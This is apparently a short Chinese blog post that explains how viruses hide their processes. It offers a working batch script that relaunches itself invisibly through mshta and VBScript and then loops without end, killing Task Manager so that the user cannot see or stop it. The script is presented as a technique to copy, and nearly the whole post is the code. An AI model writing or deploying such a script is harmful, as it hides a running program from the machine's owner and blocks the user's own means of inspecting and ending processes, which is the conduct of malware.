病毒通常情况下都会隐藏自己的进程,咱们用批处理也能将自己隐藏,来看看
@echo off if "%1" == "h" goto begin mshta vbscript:createobject("wscript.shell").run("%~nx0 h",0)(window.close)&&exit :begin for /l %%i in (1,1,255) do taskkill /f /im taskmgr.exe>nul 2>nul&ping 127.0.1 /n 1>nul goto begin
本文出自 “” 博客,请务必保留此出处